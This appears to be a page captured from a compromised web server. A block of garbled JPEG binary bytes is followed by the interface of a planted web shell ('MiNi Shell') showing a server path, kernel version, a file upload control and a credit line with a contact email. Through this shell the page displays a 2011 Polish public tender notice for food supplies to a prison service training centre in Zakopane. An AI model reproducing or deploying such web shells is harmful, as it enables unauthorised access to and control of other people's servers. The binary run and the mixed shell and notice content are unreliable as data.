JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/393030-N-2011.html

<p class="kh_header"><b>Zakopane: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 393030 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Zakopanem , ul. Ogrodowa 6, 34-500 Zakopane, woj. małopolskie, tel. 0-18 2013431, faks 0-18 2013431 wew. 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa różnych produktów spożywczych z grupy 153 w następujących ilościach:

Grupa I Wyroby ciastkarskie, cukiernicze, kawa, herbata i podobne produkty
l.p.	Nazwa towaru	J.m	Ilość
1	Baton Snickers waga od 40g do 70g netto	szt	1000
2	Baton Mars waga od 40g do 60g netto	szt	1000
3	Prince polo waga od 30g do 50g netto	szt	400
4	Ciasteczka mieszanka od 1 kg do 2 kg	kg	150
5	Czekolada mleczna waga 100g netto	kg	50
6	Wafle Grześki waga od 30g do 50g netto	szt	600
7	Delicje szampańskie waga od 100g do 300g netto	kg	80
8	Herbata Lipton pakowana w kartoniki od 50szt do 100szt w saszetkach z zawieszką waga 1 sztuki 0,002g netto	kg	100
9	Herbata Eternal pakowana w kartoniki od 50szt do 100szt w saszetkach z zawieszką waga 1 sztuki 0,002g netto	kg	100
10	HERBATA IRVING pakowana w kartoniki od od 50szt do 100szt w saszetkach z zawieszką waga sztuki 0,002g	kg	100
11	Kawa Fort mielona waga od 200g do 600g netto	kg	100
12	Kawa Maxwell House rozpuszczalna waga od 100g do 300g netto	kg	100
13	Kawa Nescafe Classic rozpuszczalna waga od 100g do 300g netto	kg	100
14	Kawa Tchibo mielona waga od 100g do 300g netto	kg	60
15	KAWA ŚNIADANIOWA PRIMA (kawa zbożowa 80% kawa naturalna rozpuszczalna 20%)	kg	100
16	Kawa Prima mielona waga od 100g do 300g netto	kg	50

Grupa II Produkty z ciasta makaronowego.
l.p.	Nazwa towaru	J.m	Ilość
1	Makaron łazanki typu lubella waga od 400g do 1000g netto	kg	100
2	Makaron tarte ciast typu lubella waga od 250g do 1000g netto	kg	100
3	Makaron świderki typu lubella waga od 400g do 1000g netto	kg	100
4	Makaron kolanka typu lubella waga od 400g do 1000g netto	kg	100
5	Makaron nitka typu lubella waga od 400g do 1000g netto	kg	100
6	Makaron gwiazdki typu lubella waga od 400g do 1000g netto	kg	100
7	Makaron muszelki duże typu lubella waga od 400g do 1000g netto	kg	100
8	Makaron gruba rurka typu lubella waga od 400g do 1000g netto	kg	100
9	Makron wstążki typu lubella waga od 400g do 1000g netto	kg	100
10	Makaron Spaghetti typu lubella waga od 400g do 1000g netto	kg	100
11	Makaron Lasagne typu lubella waga od 400g do 1000g netto	kg	100
12	Groszek ptysiowy waga od 100g do 500g netto	kg	100
13	Cukier pakowany w torebkach papierowych 1 kg netto	kg	5000
14	Cukier puder pakowany w torebkach papierowych 0,5 kg netto	kg	500
15	Cukier wanilinowy waga od 20g do 50g netto	kg	60
16	Miód prawdziwy słoik waga od 200g do 500g netto	kg	60
17	Miód sztuczny waga od 200g do 500g netto	kg	60
18	Kasza jęczmienna waga 1kg	kg	500
19	Kasza gryczana waga 1 kg	kg	200
20	Mąka ziemniaczana waga 1 kg	kg	200
21	Mąka pszenna poznańska waga 1 kg	kg	3000
22	Mąka tortowa waga 1 kg	kg	500
23	Płatki kukurydziane od 0,5kg do 1 kg	kg	200
24	Płatki czekoladowe od 05kg do 1 kg	kg	200
25	Płatki miodowe od 0,5kg do 1 kg	kg	150
26	Ryż biały waga 1 kg	kg	700
27	Olej rośliny rzepakowy waga od 0,9 do 1 litra	kg	1600
28	Margaryna Palma Bielsko-Biała od 0,25kg do 0,5kg	L	1500
29	Tłuszcz palmowy waga do 2,5kg	kg	500

Grupa III Mieszanki przypraw
l.p.	Nazwa towaru	J.m	Ilość
1	Skórka pomarańczowa w opakowaniu od 100g do 200g netto	kg	4
2	Budyń śmietankowy w opakowaniu od 30g do 50g netto	kg	30
3	Cynamon w opakowaniu od 10g do 30g netto	kg	5
4	Przyprawa do ryb typu Knorr w opakowaniu od 20g do 1000g netto	kg	5
5	Ketchup łagodny w opakowaniach z dozownikiem w opakowaniu od 250g do 500g netto	kg	200
6	Kisiel w opakowaniu od 40g do 100g netto	kg	30
7	Kminek w opakowaniu od 10g do 100g netto	kg	10
8	Kwasek cytrynowy w opakowaniu od 10g do 100g netto	kg	20
9	Liść laurowy w opakowaniu od 10g do 100g netto	kg	6
10	Majeranek w opakowaniu od 15g do 100g netto	kg	6
11	Musztarda łagodna w opakowaniach z dozownikiem od 250g do 500g netto	kg	200
12	Ocet spirytusowy w butelkach od 0,5l do 1l netto	L	100
13	Ocet winny w butelkach od 0,25l do 0,5l netto	L	30
14	Papryka słodka w opakowaniu od 10g do 50g netto	kg	6
15	Papryka ostra w opakowaniu od 10g do 50g netto	kg	6
16	Majonez typu kielecki przeznaczony do sałatek w słoikach od 250g do 700g netto	kg	600
17	Pieprz w opakowaniu od 10g do 50g netto	kg	20
18	Proszek do pieczenia w opakowaniu od 10g do 50g netto	kg	30
19	Przyprawa do kurczaka w opakowaniu od 10g do 50g netto	kg	20
20	Przyprawa do zup typu maggi w opakowaniu szklanym 0,5l do 1 l netto	L	400
21	Rosół z kury typu Knorr kostki od 10g do 20g w opakowaniu od 6szt do 10szt netto	kg	150
22	Przyprawa warzywna typu Vegeta w opakowaniu od 0,5kg do 1000g netto	kg	150
23	Ziele angielskie w opakowaniu od 5 g do 30g netto	kg	6
24	Żelatyna spożywcza w opakowaniu od 10g do 100g netto	kg	20
25	Imbir w opakowaniu od 10g do 30g netto	kg	3
26	Żurek śląski w opakowaniu od 40g do 50g netto	kg	40
27	Oregano w opakowaniu od 10gdo 30g netto	kg	2
28	Drożdże w kostkach w opakowaniu od 100g do 500g netto	kg	20
29	Przyprawa do piernika w opakowaniu od 10g do 50g netto	kg	3
30	Gałka muszkatołowa w opakowaniu od 10g do 50g netto	kg	1
31	Soda oczyszczona w opakowaniu od 30g do 100g netto	kg	5
32	Przyprawa do grilla w opakowaniu od 10g do 50g netto	kg	5
33	Kakao naturalne w opakowaniu od 80g do 200g netto	kg	10
34	Sól w opakowaniu 1 kg netto	kg	400
35	Czosnek granulowany w opakowaniu od 10g do 50g netto	kg	6

Określona ilość towaru jest wielkością szacunkową. Zamawiający nie gwarantuje zrealizowania całości zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przez upływem terminu do składnia ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można otrzymać bezpłatnie w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2011 godzina 10:00, miejsce: Ofertę należy złożyć w Sekretariacie w siedzibie zamawiającego, pokój numer 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com